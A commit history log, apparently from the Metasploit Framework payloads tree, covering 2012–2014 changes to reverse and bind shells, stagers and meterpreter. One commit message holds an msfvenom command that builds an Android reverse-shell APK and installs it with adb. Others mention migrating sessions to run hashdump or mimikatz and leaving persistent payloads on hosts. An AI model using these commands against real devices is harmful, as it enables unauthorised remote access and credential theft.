Commit Graph

842 Commits (1eafb217418b40b451ffa550ccf71f62f8ba17ad)

Author SHA1 Message Date
sinn3r 96ba41a4b0
Land #2844 - Fix the mipsbe shell_reverse_tcp payload 2014-01-10 15:00:39 -06:00
jvazquez-r7 4e8092aceb Fix armle stagers 2014-01-09 17:34:59 -06:00
jvazquez-r7 a0879b39e0 Add mips be shell_bind_tcp payload 2014-01-08 14:48:54 -06:00
jvazquez-r7 1727b7fb37 Allow the Msf::Payload::Linux's generate to make its work 2014-01-08 12:41:10 -06:00
jvazquez-r7 83e5169734 Don't use temporal register between syscals and save some bytes on the execve 2014-01-08 11:45:27 -06:00
jvazquez-r7 5f7582b72d Don't use a temporary registerfor the dup2 loop counter 2014-01-07 18:02:55 -06:00
jvazquez-r7 c2dce19768 Don't use a temporary registerfor the dup2 loop counter 2014-01-07 17:39:27 -06:00
jvazquez-r7 a85492a2d7 Fix my own busted dup2 sequence 2014-01-07 16:27:01 -06:00
Joe Vennix fb1a038024 Update async API to actually be async in all cases.
This avoids zalgo. Also optionally checks the return value
of the compiled Function in XSS to allow you to use send()
or an explicit return, which is maybe more natural for
synchronous xss payloads.
2014-01-07 16:17:34 -06:00
jvazquez-r7 3230b193e1 Make better comment 2014-01-07 15:32:46 -06:00
jvazquez-r7 80dcda6f76 Fix bind call 2014-01-07 15:31:42 -06:00
Niel Nielsen d567737657 Update reverse_tcp_rc4_dns.rb
Change to OpenSSL::Digest from deprecated OpenSSL::Digest::Digest
2014-01-07 22:12:38 +01:00
Niel Nielsen 385ae7ec38 Update reverse_tcp_rc4.rb
Change to OpenSSL::Digest from deprecated OpenSSL::Digest::Digest
2014-01-07 22:11:16 +01:00
Niel Nielsen 693d95526b Update bind_tcp_rc4.rb
Change to OpenSSL::Digest from deprecated OpenSSL::Digest::Digest
2014-01-07 22:09:53 +01:00
jvazquez-r7 b5524654d5 Delete comment 2014-01-07 14:50:26 -06:00
jvazquez-r7 45c86d149f Modify authors field 2014-01-07 14:50:12 -06:00
jvazquez-r7 d6639294aa Save some instructions with dup2 2014-01-07 14:41:33 -06:00
jvazquez-r7 9cf221cdd6 Delete delay slots after syscall 2014-01-07 13:18:20 -06:00
jvazquez-r7 70d4082c0c Add formatting blank lines and delete comment 2014-01-07 09:55:36 -06:00
jvazquez-r7 3edd2a50e2 Shorter mipsle shell_reverse_tcp 2014-01-07 09:45:28 -06:00
Joe Vennix 3b29c370bd Fix bug in the firefox/exec payload. 2014-01-05 11:24:41 -06:00
Joe Vennix 4329e5a21e Update firefox payloads to use async runCmd. 2014-01-04 08:49:43 -06:00
Joe Vennix fdca396bc8 Update exec to be diskless. 2014-01-04 08:48:58 -06:00
Joe Vennix a5ebdce262 Add exec payload. Cleans up a lot of code.
Adds some yardocs and whatnot.
2014-01-03 18:23:48 -06:00
jvazquez-r7 f5f18965b9 Move the require to the payloads as ruby and nodejs payloads do 2014-01-02 16:05:03 -06:00
Joe Vennix 06fb2139b0 Digging around to get shell_command_token to work. 2014-01-02 14:05:06 -06:00
Joe Vennix 12fece3aa6 Kill unnecessary comment. 2014-01-02 10:48:28 -06:00
Joe Vennix 1f9ac12dda DRYs up firefox payloads. 2014-01-02 10:48:28 -06:00
Joe Vennix 821aa47d7e Add firefox paylods.
* Adds support for windows or posix shell escaping.
2014-01-02 10:48:28 -06:00
jvazquez-r7 0725b9c69c Refactor JSP payloads 2013-12-31 08:27:37 -06:00
jvazquez-r7 aa38a23921 Add generate_war to jsp_shell payloads 2013-12-30 13:53:58 -06:00
OJ 0db062a1ce
Merge branch 'meatballs-vncdll-submodule' 2013-12-20 18:29:27 +10:00
OJ 34cdec5155
Update project VS 2013, clean CLI build
* Project system updated to VS 2013.
* Clean builds, had to remove a bunch of warnings.
* `make.bat` for building from the command line.
* Removed RDI stuff that shouldn't be there any more.
* Renamed the x86 DLL to include the platform name.
2013-12-20 09:49:15 +10:00
William Vu 252909a609
Land #2448, @OJ's ReverseListenerBindPort :) 2013-12-17 11:24:09 -06:00
sinn3r f1c5ab95bf
Land #2690 - typo 2013-11-25 23:53:34 -06:00
William Vu 70139d05ea Fix missed title 2013-11-25 22:46:35 -06:00
William Vu e8eb983ae1 Resplat shell_bind_tcp_random_port 2013-11-20 14:48:53 -06:00
William Vu 2c485c509e Fix caps on module titles (first pass) 2013-11-15 00:03:42 -06:00
Geyslan G. Bem 28c5dd63fd references fix 2013-11-11 17:14:50 -03:00
Geyslan G. Bem 8f6917a117 references fix 2013-11-11 17:12:45 -03:00
Geyslan G. Bem e3641158d9 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-11-11 14:29:19 -03:00
Geyslan G. Bem 030fbba539 Merge branch 'master' of https://github.com/geyslan/metasploit-framework 2013-11-11 14:22:00 -03:00
Tod Beardsley 81a7b1a9bf
Fixes for #2350, random bind shellcode
* Moved shortlink to a reference.
  * Reformat e-mail address.
  * Fixed whitespace
  * Use multiline quote per most other module descriptions

Still need to resplat the modules, but it's no big thang to do that
after landing. Also, References do not seem to appear for post modules
in the normal msfconsole. This is a bug in the UI, not for these modules
-- many payloads would benefit from being explicit on their references,
so may as well start with these.
2013-11-11 10:33:15 -06:00
OJ 063da8a22e Update reverse_https_proxy stager/handler
This change updates the proxy handler code, which for some reason was
ommitted in the orginal commits. This now uses the same mechanism as
the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead
uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`.
2013-11-11 22:21:05 +10:00
William Vu f5d1d8eace chmod -x .rb files without #! in modules and lib
It wasn't just cmdstager_printf.rb. :/
2013-10-30 19:51:25 -05:00
sinn3r 1599d1171d
Land #2558 - Release fixes 2013-10-21 13:48:11 -05:00
Tod Beardsley bce8d9a90f
Update license comments with resplat. 2013-10-21 13:36:15 -05:00
Tod Beardsley c070108da6
Release-related updates
* Lua is not an acronym
  * Adds an OSVDB ref
  * credit @jvazquez-r7, not HD, for the Windows CMD thing
2013-10-21 13:33:00 -05:00
sinn3r 032da9be10
Land #2426 - make use of Msf::Config.data_directory 2013-10-21 13:07:33 -05:00
sinn3r cacaf40276
Land #2542 - D-Link DIR-605L Captcha Handling Buffer Overflow 2013-10-21 12:03:07 -05:00
sinn3r 6430fa3354
Land #2539 - Support Windows CMD generic payload
This also upgrades auxiliary/admin/scada/igss_exec_17 to an exploit
2013-10-21 11:26:13 -05:00
William Vu 5a0b8095c0
Land #2382, Lua bind and reverse shells 2013-10-18 17:11:37 -05:00
jvazquez-r7 be1d6ee0d3 Support Windows CMD generic payload 2013-10-17 14:07:27 -05:00
jvazquez-r7 3d3a7b3818 Add support for OSVDB 86824 2013-10-17 01:08:01 -05:00
Tod Beardsley f0aedd932d
More stragglers 2013-10-16 16:29:55 -05:00
Tod Beardsley ba2c52c5de
Fixed up some more weird splat formatting. 2013-10-16 16:25:48 -05:00
Tod Beardsley 5d86ab4ab8
Catch mis-formatted bracket comments. 2013-10-15 14:52:12 -05:00
Tod Beardsley ed0b84b7f7
Another round of re-splatting. 2013-10-15 14:14:15 -05:00
Tod Beardsley c83262f4bd
Resplat another common boilerplate. 2013-10-15 14:07:48 -05:00
Tod Beardsley 23d058067a
Redo the boilerplate / splat
[SeeRM #8496]
2013-10-15 13:51:57 -05:00
sinn3r e10dbf8a5d
Land #2508 - Add nodejs payloads 2013-10-14 12:23:31 -05:00
joev c7bcc97dff Add SSL support to #nodejs_reverse_tcp. 2013-10-12 03:32:52 -05:00
joev 6440a26f04 Move shared Node.js payload logic to mixin.
- this fixes the recursive loading issue when creating a payload
  inside the cmd payload
- also dries up some of the node cmd invocation logic.
2013-10-12 03:19:06 -05:00
Meatballs 9ca9b4ab29
Merge branch 'master' into data_dir
Conflicts:
	lib/msf/core/auxiliary/jtr.rb
2013-10-10 19:55:26 +01:00
joev 1e78c3ca1a Add missing require to nodejs/bind payload. 2013-10-09 11:39:05 -05:00
Tod Beardsley 4266b88a20
Move author name to just 'joev'
[See #2476]
2013-10-07 12:50:04 -05:00
joev da48565093 Add more payloads for nodejs.
* Adds a reverse and bind CMD payload
* Adds a bind payload (no bind_ssl for now).
2013-10-07 06:09:21 -05:00
Geyslan G. Bem 6492bde1c7 New Payload
Merge remote-tracking branch 'origin'
2013-10-05 09:17:14 -03:00
Geyslan G. Bem 31f265b411 New Shell Bind TCP Random Port Payload (x86_64) 2013-10-05 09:02:05 -03:00
Meatballs 7ba846ca24 Find and replace 2013-09-26 20:34:48 +01:00
joev 99e46d2cdb Merge branch 'master' into cve-2013-4660_js_yaml_code_exec
Conflicts:
	modules/exploits/multi/handler.rb
2013-09-25 00:32:56 -05:00
joev cd98c4654d Remove unecessary print from #generate in payloads. 2013-09-25 00:12:28 -05:00
Tod Beardsley c547e84fa7 Prefer Ruby style for single word collections
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.

This change converts all Payloads to this format if there is more than
one payload to choose from.

It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.

See:
  https://github.com/bbatsov/ruby-style-guide#collections
2013-09-24 12:33:31 -05:00
Joe Vennix 801dda2b09 Change PayloadType to NodeJS. 2013-09-23 11:31:45 -05:00
xistence 41e1a3d05b removed shell prompt in lua bind/reverse shells 2013-09-22 14:53:59 +07:00
Joe Vennix a08d195308 Add Node.js as a platform.
* Fix some whitespace issues in platform.rb
2013-09-20 18:14:01 -05:00
Meatballs 02044e8b5e Land #2373, Corrects x64 reverse_https alignment
It appears that testing of the original submit was performed
on VMWare which worked. On a non virtualized machine the
payload would crash.

[Closes #2373] [FixRm #8271]
2013-09-17 22:50:04 +01:00
Meatballs 6bf0d9b761 Cleanup 2013-09-17 21:46:38 +01:00
James Lee 21055f6856 Add x86 to meterpreter's binary suffix
This makes x86 more consistent with x64.

Also replaces a bunch of instances of:
  File.join(Msf::Config.install_root, 'data', ...)
with the simpler
  File.join(Msf::Config.data_directory, ...)

[See rapid7/meterpreter#19]
2013-09-16 21:52:04 -05:00
Joe Vennix a641bc41a8 Kill unnecessary comment. 2013-09-16 21:35:53 -05:00
Joe Vennix f954e5299f Now working on windows even. 2013-09-16 21:34:12 -05:00
Ryan Wincey fe86325fd4 Fixed memory alignment for x64 reverse_http stager 2013-09-16 16:43:20 -04:00
Joe Vennix 2d936fb67c Bail from payload if require() is not available.
* TODO: test on windows
2013-09-16 14:05:26 -05:00
RageLtMan 08f0abafd6 Add nodejs single payloads, thanks to RageLtMan. 2013-09-16 13:38:42 -05:00
xistence 79e08c1560 added LUA bind/reverse shells 2013-09-16 17:02:08 +07:00
MosDefAssassin b7dec23a1d Update meterpreter.rb
Meterpreter Error: Uninitialized Constant Error Prevents a 32bit Meterpreter session from migrating to a 64bit process.
Discovered: September 9th 2013
Fixed: September 11th 2013 By MosDefAssassin
Contact:ara1212@gmail.com
Tested on Windows 2008 R2 SP1 Running as a Domain Controller

Issue:
An issue has been discovered when you have created a simple 32bit windows/meterpreter/reverse_tcp payload and have launched the payload on the victim to obtain a remote meterpreter session. While in this session you attempt to migrate your 32bit process over to a 64bit process in order to take advantage of tools like hashdump or mimikatz or obtain system level access under a 64bit process that runs as system such as dns.exe. However when you attempt to migrate to a 64bit process you receive the following error:
 
Error running command migrate: NameError uninitialized constant Msf::Payload::Windows::ReflectiveDllInject_x64

Cause and Resolution:
This issue occurs because the meterpreter.rb file that is being called from within
“/opt/metasploit/apps/pro/msf3/modules/payloads/stages/windows/” folder
does not contain the following classes:
require 'msf/core/payload/windows/x64/reflectivedllinject'
require 'msf/base/sessions/meterpreter_x64_win'
Once you add these two classes to the meterpreter.rb file, you will be able to migrate to 64bit processes from a basic msfpayload generated 32bit meterpreter payload.
2013-09-12 14:32:13 -05:00
Geyslan G. Bem 118cc900a7 new payload 2013-09-10 19:20:48 -03:00
HD Moore 06f7abc552 Helps to put the rand() wrapper in 2013-09-09 20:26:11 -05:00
HD Moore baff3577e5 FixRM #8034 Pick a valid certificate expiration 2013-09-09 20:24:52 -05:00
Tab Assassin 896bb129cd Retab changes for PR #2325 2013-09-05 13:24:09 -05:00
Tab Assassin 5ff25d8b96 Merge for retab 2013-09-05 13:23:25 -05:00
James Lee b913fcf1a7 Add a proper PrependFork for linux
Also fixes a typo bug for AppendExit
2013-09-04 00:15:07 -05:00
Tab Assassin cbb9984358 Merge branch 'master' into retab/rumpus 2013-09-03 14:11:16 -05:00
jvazquez-r7 ff6ee5b145 Fix require 2013-09-03 10:52:52 -05:00
Tab Assassin 41e4375e43 Retab modules 2013-08-30 16:28:54 -05:00
Spencer McIntyre ffac6478cc Un typo a client and server socket mixup. 2013-08-21 14:59:30 -04:00
Spencer McIntyre e276b57ee7 Merge remote-tracking branch 'upstream/master' into python-meterpreter-dev 2013-08-19 08:37:12 -04:00
Spencer McIntyre 2d69174c5b Initial commit of the python meterpreter. 2013-08-05 23:38:49 -04:00
Tod Beardsley bddcb33507 Update description for reverse_https_proxy 2013-08-05 09:35:14 -05:00
sinn3r 10e9b97a88 Land #2180 - Accepting args for x64 osx exec payload 2013-08-02 00:45:09 -05:00
Joe Vennix 592176137a Rewrite osx x64 cmd payload to accept args.
[SeeRM #8260]
2013-07-31 08:50:28 -05:00
Tod Beardsley 7e539332db Reverting disaster merge to 593363c5f with diff
There was a disaster of a merge at 6f37cf22eb that is particularly
difficult to untangle (it was a bad merge from a long-running local
branch).

What this commit does is simulate a hard reset, by doing thing:

 git checkout -b reset-hard-ohmu
 git reset --hard 593363c5f9
 git checkout upstream-master
 git checkout -b revert-via-diff
 git diff --no-prefix upstream-master..reset-hard-ohmy > patch
 patch -p0 < patch

Since there was one binary change, also did this:

 git checkout upstream-master data/exploits/CVE-2012-1535/Main.swf

Now we have one commit that puts everything back. It screws up
file-level history a little, but it's at least at a point where we can
move on with our lives. Sorry.
2013-07-29 21:47:52 -05:00
jvazquez-r7 4a0b33241f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-25 18:41:50 -05:00
sinn3r 7b7603a5e7 Land #2104 - reverse_https_proxy 2013-07-25 17:26:56 -05:00
sinn3r 8dae114c7c msftidy happiness 2013-07-25 17:25:36 -05:00
jvazquez-r7 1a5e0e10a5 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-18 13:53:57 -05:00
sinn3r b64d0429ac Format fix
Just to make this more pleasing to the eyes
2013-07-18 13:36:31 -05:00
Joe Vennix cd2e352971 Kill extra whitespace. 2013-07-18 11:30:54 -05:00
Joe Vennix 766a8d5817 Shellwords! Now you can use exec to get you a perl shell 2013-07-17 21:16:04 -05:00
Joe Vennix 9c1228067c Change to += syntax. 2013-07-17 21:11:24 -05:00
Joe Vennix ab088712ba Removes unnecessary copy-to-stack. Fixes arg-order issue.
* Now I simply point to the string in instruction-memory, which saves a few bytes.
2013-07-17 20:27:20 -05:00
Joe Vennix 5ab81e7e37 Convert to readable asm. Adds support for arguments.
* shellcode appears to do an unnecessary copy-to-stack, so will look into
  improving that.
2013-07-17 19:20:47 -05:00
Alexandre Maloteaux e28dd42992 add http authentification and socks 2013-07-15 15:36:58 +01:00
Alexandre Maloteaux f48c70d468 enable tor and small fix 2013-07-13 17:59:49 +01:00
corelanc0d3r e8983a21c5 New meterpreter payload reverse_https_proxy 2013-07-12 16:45:16 -04:00
jvazquez-r7 785639148c Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-20 17:18:42 -05:00
William Vu 589b4be384 Land #1999, zsh bind shell 2013-06-20 13:51:48 -05:00
sinn3r 86fc101c1f Add payload module bind zsh
For #1984
2013-06-20 13:45:02 -05:00
sinn3r 660c97f512 Add module for reverse zsh payload
For #1985
2013-06-20 13:40:17 -05:00
jvazquez-r7 b20a38add4 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-10 12:22:52 -05:00
Tod Beardsley f58e279066 Cleanup on module names, descriptions. 2013-06-10 10:52:22 -05:00
jvazquez-r7 e5a17ba227 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-05 09:41:23 -05:00
William Vu 1596fb478a Land #1886, awk bind shell 2013-06-05 09:05:37 -05:00
William Vu 8ffa4ac9ac Land #1885, awk reverse shell 2013-06-05 09:04:49 -05:00
Roberto Soares Espreto f6977c41c3 Modifications done in each PR. 2013-06-05 07:55:05 -03:00
Roberto Soares Espreto b20401ca8c Modifications done in each PR. 2013-06-05 07:51:10 -03:00
Roberto Soares Espreto 34243165c5 Some changes with improvements. 2013-06-04 21:22:10 -03:00
Roberto Soares Espreto e2988727fb Some changes with improvements. 2013-06-04 21:10:51 -03:00
Roberto Soares Espreto d9609fb03e Was breaking with repeated commands 2013-05-31 18:44:48 -03:00
jvazquez-r7 48b14c09e3 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-31 01:12:46 -05:00
Tod Beardsley 9c771435f2 Touchup on author credit 2013-05-30 16:13:40 -05:00
Tod Beardsley 67128a3841 Land #1821, x64_reverse_https stagers 2013-05-30 13:55:13 -05:00
jvazquez-r7 3361a660ba Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-29 22:01:36 -05:00
Roberto Soares Espreto 00debd01c6 Listen for a connection and spawn a command shell via AWK 2013-05-29 21:22:49 -03:00
Roberto Soares Espreto d4a864c29f Creates an interactive shell via AWK (reverse) 2013-05-29 21:19:08 -03:00
jvazquez-r7 07c99f821e Land #1879, @dcbz ARM stagers 2013-05-29 17:43:37 -05:00
jvazquez-r7 7c41e239b4 Fix author name 2013-05-29 14:19:10 -05:00
jvazquez-r7 52aae8e04c Add small fixes for stagers 2013-05-29 14:01:59 -05:00
dcbz 2c0f0f5f04 Changed reverse payload as suggested. 2013-05-28 21:52:16 -05:00
dcbz 07c3565e3c Made changes as suggested, forgot to remove exit() after testing was complete. 2013-05-28 21:31:36 -05:00
jvazquez-r7 66ea59b03f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-05-28 15:22:46 -05:00
James Lee 9843dc4cb4 Land #1708, android meterpreter
Conflicts:
	data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
dcbz a53ab4cff9 Moved dupandexecve.rb to shell.rb due to pull request coments. 2013-05-20 17:05:57 -05:00
dcbz 9c0814505a Added reverse stager. 2013-05-17 21:52:10 -05:00
dcbz 14d5111b37 Added a sample stage + updated bind stager. 2013-05-17 21:03:03 -05:00
dcbz ad95eff9d4 added bind_tcp.rb 2013-05-17 12:09:45 -05:00
agix 6db1fea6b9 create x64_reverse_https stagers 2013-05-13 01:41:56 +02:00
Michael Schierl a13cf53b9f Android Meterpreter bugfixes
- classes.dex gets mangled on windows; use binary mode when reading it
- UnknownHostExceptions on API Level 3 emulator because of trailing
  whitespace after the hostname/IP
- Work around integer overflow at year 2038 when signing the payload
2013-05-01 18:01:37 +02:00
jvazquez-r7 a4632b773a Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-28 12:59:16 -05:00
sinn3r 1d9a695d2b Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
[Closes #1772]
2013-04-28 12:17:16 -05:00
James Lee 9c8b93f1b7 Make sure LPORT is a string when subbing
* Gets rid of conversion errors like this:
    [-] Exploit failed: can't convert Fixnum into String
* also removes comments from php meterp. Works for me with the
  phpmyadmin_preg_replace bug, so seems legit.
2013-04-26 15:26:31 -05:00
James Lee 6767eee08a Add in-line signing
Signing the generated APK in the module means users don't have to have
keytool or jarsigner to create a working package.

Example usage:
  ./msfvenom -p android/meterpreter/reverse_tcp \
    LHOST=192.168.99.1 LPORT=2222 -f raw > meterp.apk
  adb install ./meterp.apk
2013-04-25 13:57:54 -05:00
jvazquez-r7 cc35591723 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-15 17:43:15 -05:00
Tod Beardsley be39079830 Trailing whitespace fix
Note that this commit needed a --no-verify because of the erroneous
check in msftidy for writing to stdout. The particular syntax of this
payload makes it look like we're doing that when we're really not.

So don't sweat it.
2013-04-15 13:58:06 -05:00
Tod Beardsley efdf4e3983 Lands #1485, fixes for Windows-based Ruby targets 2013-04-15 13:56:41 -05:00
timwr df9c5f4a80 remove unused resources and fix whitespace 2013-04-13 16:22:52 +01:00
timwr 32bd812bdb android meterpreter 2013-04-12 18:57:04 +01:00
jvazquez-r7 9c0862ad7b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-11 21:53:07 +02:00
James Lee e3eef76372 Land #1223
This adds rc4-encrypting stagers for Windows.

[Closes #1223]
2013-04-10 12:14:52 -05:00
James Lee 6c980981db Break up long lines and add magic encoding comment 2013-04-10 09:28:45 -05:00
Tod Beardsley e149c8670b Unconflicting ruby_string method
Looks like the conflict was created by the msftidy fixes that happened
over on the master branch. No big deal after all.
2013-03-20 15:49:23 -05:00
jvazquez-r7 6603dcd652 up to date 2013-03-12 17:04:13 +01:00
jvazquez-r7 627e7f6277 avoiding grouping options 2013-03-11 18:26:03 +01:00
jvazquez-r7 f0cee29100 modified CommandDispatcher::Exploit to have the change into account 2013-03-11 18:08:46 +01:00
jvazquez-r7 c9268c3d54 original modules renamed 2013-03-11 18:04:22 +01:00
James Lee 2160718250 Fix file header comment
[See #1555]
2013-03-07 17:53:19 -06:00
RageLtMan 7f80692457 everyone will comply, resistance is futile 2013-03-06 18:38:14 -05:00
Raphael Mudge 1cc49f75f5 move flag comment to where it's used. 2013-03-03 03:26:43 -05:00
Raphael Mudge ecdb884b13 Make download_exec work with authenticated proxies
Adds INTERNET_FLAG_KEEP_CONNECTION to HttpOpenRequest flags to allow
download_exec to transparently authenticate to a proxy device through
wininet.

Fun trivia, Windows 7 systems uses Connection: keep-alive by default.
This flag benefits older targets (e.g., Windows XP).
2013-03-03 01:42:17 -05:00
Michael Schierl 4a17a30ffd Regenerate ruby modules
For shellcode changes (removed unneeded instruction) committed in
46a5c4f4bf. Saves 2 bytes per shellcode.
2013-03-03 00:14:30 +01:00
RageLtMan 3778ae09e9 This commit adds DNS resolution to rev_tcp_rc4
Due to the modular structure of payload stages its pretty trivial
to add DNS resolution instead of hard-coded IP address in stage0.

The only real complication here is that ReverseConnectRetries ends
up being one byte further down than in the original shellcode. It
appears that the original rev_tcp_dns payload suffers from the same
issue.

Hostname substitution is handled in the same method as the RC4 and
XOR keys, with an offset provided and replace_vars ignoring the
hostname.

Tested in x86 native and WOW64 on XP and 2k8r2 respectively.

This is a good option for those of us needing to leave persistent
binaries/payloads on hosts for long periods. Even if the hostname
resolves to a malicious party attempting to steal our hard earned
session, they'd be hard pressed to crypt the payload with the
appropriate RC4 pass. So long as we control the NS and records, the
hardenned shellcode should provide a better night's sleep if running
shells over the WAN. Changing the RC4 password string in the
shellcode and build.py should reduce the chances of recovery by RE.

Next step will likely be to start generating elipses for ECDH SSL
in meterpreter sessions and passing them with stage2 through the
RC4 socket. If P is 768-1024 the process is relatively quick, but
we may want to precompute a few defaults as well to have 2048+.
2013-02-28 02:59:20 -05:00
Raphael Mudge 788c96566f Allow HTTP stager to work with authenticated proxies
The HttpOpenRequest function from WinINet requires the
INTERNET_FLAG_KEEP_CONNECTION flag to communicate through an
authenticated proxy.

From MSDN ( http://tinyurl.com/chwt86j ):

"Uses keep-alive semantics, if available, for the connection. This
 flag is required for Microsoft Network (MSN), NT LAN Manager (NTLM),
 and other types of authentication."

Without this flag, the HTTP stager will fail when faced with a proxy
that requires authentication. The Windows HTTPS stager does not have
this problem.

For HTTP Meterpreter to communicate through an authenticated proxy a
separate patch will need to be made to the Meterpreter source code.
This is at line 1125 of source/common/core.c in the Meterpreter source
code.

My motivation for this request is for windows/dllinject/reverse_http
to download a DLL even when faced with an authenticated proxy. These
changes accomplish this.

Test environment:

I staged a SmoothWall device with the Advanced Proxy Web Add-on. I
enabled Integrated Windows Authentication with a W2K3 DC. I verified
the HTTP stager authenticated to and communicated through the proxy
by watching the proxy access.log
2013-02-24 17:33:00 -05:00
James Lee c423ad2583 Merge branch 'master' of github.com:rapid7/metasploit-framework into rapid7 2013-02-21 15:30:43 -06:00
jvazquez-r7 04ec4e432d minor cleanup for shell_bind_tcp 2013-02-20 01:02:58 +01:00
jvazquez-r7 3d199fe6db Merge branch 'mipsle-shell_bind_tcp' of https://github.com/kost/metasploit-framework into kost-mipsle-shell_bind_tcp 2013-02-20 01:00:34 +01:00
sinn3r e9f4900beb Merge branch 'fixgenericcustom' of github.com:rsmudge/metasploit-framework into rsmudge-fixgenericcustom 2013-02-19 14:47:18 -06:00
Raphael Mudge 06ba2ef791 Allow generic/custom payload to generate an exe
The datastore value of ARCH has no effect on the array of
architectures the generic/custom payload is compatible with.
This commit forces the payload to update its list of compatible
architectures on generation if the ARCH value is set in the
datastore.

See:

http://dev.metasploit.com/redmine/issues/7755
2013-02-17 20:39:54 -05:00
HD Moore cae6661574 Handle invalid commands gracefully (dont exit) 2013-02-12 11:33:23 -08:00
HD Moore 4c2bddc452 Fix a typo and always treat ports as integers: 2013-02-12 08:59:11 -08:00
HD Moore a33d1ef877 This allows the ruby payloads to work properly on Windows 2013-02-12 08:55:37 -08:00
HD Moore 47f3c09616 Fix typo that snuck in during merge 2013-02-03 17:38:19 -06:00
HD Moore 5be4d41420 This is redundant/less-reliable than reverse_openssl 2013-02-03 17:35:14 -06:00
RageLtMan ffb88baf4a initial module import from SV rev_ssl branch 2013-02-03 15:06:24 -05:00
HD Moore c3801ad083 This adds an openssl CMD payload and handler 2013-02-03 04:44:25 -06:00
James Lee 92c736a6a9 Move fork stuff out of exploit into payload mixin
Tested xml against 3.2.10 and json against 3.0.19
2013-01-28 21:34:39 -06:00
Kacper Nowak f691652594 attempt to fix cmd/windows/reverse_perl payload 2013-01-23 11:21:44 +00:00
scriptjunkie 52251867d8 Ensure Windows single payloads use payload backend
This means the singles that define their own assembly will use the payload backend to generate it.
2013-01-18 16:34:39 -06:00
James Lee c89b2b2ec6 Once more, with feeling 2013-01-10 15:29:54 -06:00
James Lee 7fd3440c1a Fix hd's attempt to rename ruby payloads 2013-01-10 15:25:50 -06:00
James Lee 4fcb8b6f8d Revert "Rename again to be consistent with payload naming"
This reverts commit 0fa2fcd811.
2013-01-10 15:24:25 -06:00
HD Moore 0fa2fcd811 Rename again to be consistent with payload naming 2013-01-10 14:16:37 -06:00
HD Moore 88b08087bf Renamed and made more robust 2013-01-10 14:05:29 -06:00
HD Moore e05f4ba927 Thread wrappers were causing instant session closure 2013-01-10 00:41:58 -06:00
HD Moore 4c1e501ed0 Exploit for CVE-2013-0156 and new ruby-platform modules 2013-01-09 23:10:13 -06:00
Christian Mehlmauer 8f2dd8e2ce msftidy: Remove $Revision$ 2013-01-04 00:48:10 +01:00
Christian Mehlmauer 25aaf7a676 msftidy: Remove $Id$ 2013-01-04 00:41:44 +01:00
Michael Schierl 269e507f68 Add stager modules for RC4 bind and reverse stagers
See the commit message of my last commit for caveats.
2012-12-31 22:33:30 +01:00
sinn3r 0822e8eae2 Merge branch 'kost-mipsle-shell_reverse_tcp' 2012-12-24 10:52:19 -06:00
jvazquez-r7 26f561795d fix cmd windows ruby payloads 2012-12-20 00:50:02 +01:00
sinn3r 7145078e63 Merge branch 'mipsle-shell_reverse_tcp' of git://github.com/kost/metasploit-framework into kost-mipsle-shell_reverse_tcp 2012-12-18 11:50:41 -06:00
Raphael Mudge 482846942a Fix: download_exec appends an extra / to request
The download_exec module parses the provided URL and appends an
unnecessary, nay--damaging I say!!!! '/' to the parsed URI. This
renders the module unusable for those who want a payload to
download and execute a file.

Before and after access.log snippets are in the redmine ticket

http://dev.metasploit.com/redmine/issues/7592
2012-12-12 14:01:31 -06:00
Vlatko Kosturjak 4ac79c91a6 Remove spaces at EOL 2012-11-17 12:00:59 +01:00
sinn3r 8648d21b3c Merge branch 'dns_txt_query_exe' of git://github.com/corelanc0d3r/metasploit-framework into corelanc0d3r-dns_txt_query_exe 2012-11-16 11:52:57 -06:00
corelanc0d3r 0bf92b5d97 improved payload dns_txt_query_exec 2012-11-13 00:55:32 +01:00
corelanc0d3r cad7eb0130 renamed and optimized download_exec payload 2012-11-13 00:02:49 +01:00
Vlatko Kosturjak bda7f68b02 Add zero byte on the end of the /bin/sh string 2012-11-08 02:00:49 +01:00
Vlatko Kosturjak ce82b37289 Few removals of unneccessary zero bytes in sc 2012-10-28 21:22:33 +01:00
Vlatko Kosturjak 2affb31958 Initial import of linux-mipsle shell_bind_tcp 2012-10-28 20:51:45 +01:00
Daniel Miller 8deead3bd2 Fix payload ambiguity with php/bind_tcp_ipv6 stager
Was seeing this in framework.log:

[w(0)] core: The module php/meterpreter/bind_tcp is ambiguous with
php/meterpreter/bind_tcp.

Added handler_type_alias based on windows/bind_ipv6_tcp stager.
2012-10-23 12:31:14 -05:00
sinn3r 201518b66f msftidy corrections 2012-10-17 17:22:26 -05:00
jvazquez-r7 6f227dddff Related to #885 , allow Prepend* for osx/x86/exec payload 2012-10-16 16:26:18 +02:00
HD Moore 64f29952dc Merge branch 'master' into feature/updated-mobile 2012-10-07 00:32:02 -05:00
sinn3r 02617a6f3a Merge branch 'feature/redmine-7224-shellcode-cleanup' of https://github.com/jlee-r7/metasploit-framework into jlee-r7-feature/redmine-7224-shellcode-cleanup 2012-10-04 00:43:34 -05:00
Tod Beardsley a38724f53b Adds an apparently spurious require
SeeRM #7276

Sticking this in a branch for now while I ask Egypt and limhoff for a
second opinion.
2012-10-01 07:49:58 -05:00
Tod Beardsley 60b4190e4a Avoids a race on requires
Applies Raphael's patch.

[FixRM #7261]
2012-09-27 13:18:50 -05:00
sinn3r c0387f1441 Have a matching option like the post module
And make sure nemo won't get harassed by people because they
think he hacked into everyone's mac.
2012-09-24 18:33:13 -05:00
sinn3r 2769a88f9e Code cleanup 2012-09-24 17:47:14 -05:00
